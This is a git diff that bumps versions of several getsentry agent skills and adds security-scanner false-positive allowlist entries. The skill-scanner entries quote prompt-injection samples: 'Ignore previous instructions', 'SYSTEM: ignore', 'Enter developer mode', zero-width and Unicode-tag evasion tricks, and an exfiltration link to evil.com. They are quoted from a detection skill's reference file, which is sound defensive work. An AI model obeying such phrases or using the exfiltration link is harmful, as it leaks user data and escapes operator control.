diff --git a/skills/agents-md/spec.yaml b/skills/agents-md/spec.yaml index 31510613..a36a46c0 100644 --- a/skills/agents-md/spec.yaml +++ b/skills/agents-md/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/agents-md" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/claude-settings-audit/spec.yaml b/skills/claude-settings-audit/spec.yaml index b9ebd834..bd01450e 100644 --- a/skills/claude-settings-audit/spec.yaml +++ b/skills/claude-settings-audit/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/claude-settings-audit" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/code-review/spec.yaml b/skills/code-review/spec.yaml index 637a0e29..796e0fb3 100644 --- a/skills/code-review/spec.yaml +++ b/skills/code-review/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/code-review" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/code-simplifier/spec.yaml b/skills/code-simplifier/spec.yaml index e5458232..bed17975 100644 --- a/skills/code-simplifier/spec.yaml +++ b/skills/code-simplifier/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/code-simplifier" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/commit/spec.yaml b/skills/commit/spec.yaml index 044ad4c7..8ca76c2f 100644 --- a/skills/commit/spec.yaml +++ b/skills/commit/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/commit" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/create-branch/spec.yaml b/skills/create-branch/spec.yaml index c9eaeda3..0c858dcc 100644 --- a/skills/create-branch/spec.yaml +++ b/skills/create-branch/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/create-branch" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/django-access-review/spec.yaml b/skills/django-access-review/spec.yaml index 2d284da0..0a022cb6 100644 --- a/skills/django-access-review/spec.yaml +++ b/skills/django-access-review/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/django-access-review" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/django-perf-review/spec.yaml b/skills/django-perf-review/spec.yaml index 119d290f..a846aa1f 100644 --- a/skills/django-perf-review/spec.yaml +++ b/skills/django-perf-review/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/django-perf-review" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/doc-coauthoring/spec.yaml b/skills/doc-coauthoring/spec.yaml index c633137d..a570114e 100644 --- a/skills/doc-coauthoring/spec.yaml +++ b/skills/doc-coauthoring/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/doc-coauthoring" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" @@ -21,3 +21,8 @@ security: allowed_issues: - rule_id: MANIFEST_MISSING_LICENSE reason: "getsentry/skills is licensed Apache-2.0 at the repository root; upstream does not embed an SPDX license identifier in per-skill SKILL.md frontmatter." + # FP: ATR_2026_00051 pattern-matches "For each" in SKILL.md's Step 2 + # (Test with Sub-Agent) — plain prose describing iterating reader questions + # through a fresh sub-agent, no executable content. + - rule_id: ATR_2026_00051 + reason: "FP: cisco-ai-skill-scanner matched the prose phrase 'For each' in SKILL.md (Step 2: Test with Sub-Agent, 'For each question, invoke a sub-agent...'). Plain workflow documentation, no executable threat." diff --git a/skills/find-bugs/spec.yaml b/skills/find-bugs/spec.yaml index 02689916..4f2755cf 100644 --- a/skills/find-bugs/spec.yaml +++ b/skills/find-bugs/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/find-bugs" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" @@ -30,3 +30,8 @@ security: the command is hard-coded skill content (not attacker-controlled) and uses only read-only tools (`git diff`, `gh repo view`). Verified at digest 5cfc9e22a91c2d3a230c4d5154ea0f1babce3b28. + # The scanner now emits this same finding under a numbered ATR_2026_* id + # instead of the named rule above (rule-id scheme changed upstream in the + # scanner tooling) -- same command, same justification, re-verified at 5a64b36. + - rule_id: ATR_2026_00111 + reason: "FP: same finding as ATR_MCP_MALICIOUS_RESPONSE above -- the scanner's rule_id naming changed from named (ATR_MCP_*) to numbered (ATR_2026_*) ids. Matched $(gh repo view --json defaultBranchRef --jq '.defaultBranchRef.name') (SKILL.md:7), a read-only command substitution for diff-scoping. Re-verified at getsentry/skills @5a64b36." diff --git a/skills/gh-review-requests/spec.yaml b/skills/gh-review-requests/spec.yaml index f5e0ac20..041fb068 100644 --- a/skills/gh-review-requests/spec.yaml +++ b/skills/gh-review-requests/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/gh-review-requests" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/gha-security-review/spec.yaml b/skills/gha-security-review/spec.yaml index 134b6629..0e16eec9 100644 --- a/skills/gha-security-review/spec.yaml +++ b/skills/gha-security-review/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/gha-security-review" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/iterate-pr/spec.yaml b/skills/iterate-pr/spec.yaml index 07af44f0..98f485eb 100644 --- a/skills/iterate-pr/spec.yaml +++ b/skills/iterate-pr/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/iterate-pr" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/pr-writer/spec.yaml b/skills/pr-writer/spec.yaml index eae606f7..ca2b93ff 100644 --- a/skills/pr-writer/spec.yaml +++ b/skills/pr-writer/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/pr-writer" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/prompt-optimizer/spec.yaml b/skills/prompt-optimizer/spec.yaml index 8a457a2b..fb5c944b 100644 --- a/skills/prompt-optimizer/spec.yaml +++ b/skills/prompt-optimizer/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/prompt-optimizer" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/security-review/spec.yaml b/skills/security-review/spec.yaml index 681d5cea..cbb3eea4 100644 --- a/skills/security-review/spec.yaml +++ b/skills/security-review/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/security-review" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" diff --git a/skills/skill-scanner/spec.yaml b/skills/skill-scanner/spec.yaml index b914507c..b0851f72 100644 --- a/skills/skill-scanner/spec.yaml +++ b/skills/skill-scanner/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/skill-scanner" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills" @@ -27,3 +27,39 @@ security: reason: "The skill's reference material on prompt-injection patterns cites 'Enter developer mode' as an example jailbreak pattern the skill teaches to detect. Documenting the pattern is the skill's purpose." - rule_id: YARA_prompt_injection_unicode_steganography reason: "The skill documents invisible Unicode steganography (`\\U000e0001` tag characters) as a prompt-injection vector. Describing the attack class is required for the skill to teach detection of it." + # Same "meta-skill documents attack patterns for detection" class as the + # three rules above -- references/prompt-injection-patterns.md contains an + # actual zero-width-space character (U+200B) as a worked example of the + # "split keywords to evade pattern matching" evasion technique it teaches + # the scanner to detect. + - rule_id: ATR_2026_00276 + reason: "FP: this meta-skill's reference doc on prompt-injection patterns (references/prompt-injection-patterns.md) includes an actual zero-width-space character as a worked example of the 'Zero-Width Characters' evasion technique it documents. Teaching the detection pattern requires an example of the pattern; not an injection attempt against this skill itself." + # references/prompt-injection-patterns.md (153 lines total) is entirely a + # catalog of documented injection/jailbreak example strings for this + # meta-skill to teach detection of -- upstream's own "False Positive Guide" + # section in the same file states: "Security skills are not malicious for + # discussing injection patterns" and "Patterns in references/ files are + # almost always documentation." The scanner's non-deterministic meta-analysis + # surfaces a different subset of this same short, bounded file's example + # strings ("Ignore previous instructions", "SYSTEM: ignore", jailbreak + # examples, "exfil", etc.) on each re-scan. Allowlisting the full set of + # rule_ids observed across multiple scans of this file to stop the + # whack-a-mole, rather than one at a time. getsentry/skills @5a64b36. + - rule_id: ATR_2026_00004 + reason: "FP: matched '### Instruction' / 'SYSTEM: ignore' headers in references/prompt-injection-patterns.md's catalog of documented injection example strings. See file-level note above." + - rule_id: ATR_2026_00010 + reason: "FP: matched backtick-wrapped fragments in references/prompt-injection-patterns.md's documentation tables. See file-level note above." + - rule_id: ATR_2026_00063 + reason: "FP: matched 'exfil' in references/prompt-injection-patterns.md's documented exfiltration-vector examples (e.g. `[](https://evil.com/exfil?data=...)`). See file-level note above." + - rule_id: ATR_2026_00095 + reason: "FP: matched 'ignore previous instructions' as a documented example string (repeated across the Instruction Override / Hidden Content Vectors tables) in references/prompt-injection-patterns.md. See file-level note above." + - rule_id: ATR_2026_00111 + reason: "FP: matched '`cat -v`' (a documented detection command for Unicode tag-character steganography) in references/prompt-injection-patterns.md. See file-level note above." + - rule_id: ATR_2026_00128 + reason: "FP: matched the documented HTML-comment injection example '' in references/prompt-injection-patterns.md. See file-level note above." + - rule_id: ATR_2026_00213 + reason: "FP: matched 'Ignore previous instructions' as a documented example string in references/prompt-injection-patterns.md. See file-level note above." + - rule_id: ATR_2026_00265 + reason: "FP: matched 'ignore previous instructions' as a documented example string in references/prompt-injection-patterns.md. See file-level note above." + - rule_id: YARA_jailbreak_generic + reason: "FP: matched the word 'example'/'Example' inside the Jailbreak Patterns section's own worked examples in references/prompt-injection-patterns.md. See file-level note above." diff --git a/skills/skill-writer/spec.yaml b/skills/skill-writer/spec.yaml index b4300c77..7ac4e861 100644 --- a/skills/skill-writer/spec.yaml +++ b/skills/skill-writer/spec.yaml @@ -9,9 +9,9 @@ metadata: spec: repository: "https://github.com/getsentry/skills" - ref: "c81373583417504de2d3be1ae3d81977b11b2981" # main as of 2026-04-20 + ref: "5a64b36c62d042d3981b7937d9d6ca7bd1753b9a" # main as of 2026-04-20 path: "skills/skill-writer" - version: "0.1.1" + version: "0.2.0" provenance: repository_uri: "https://github.com/getsentry/skills"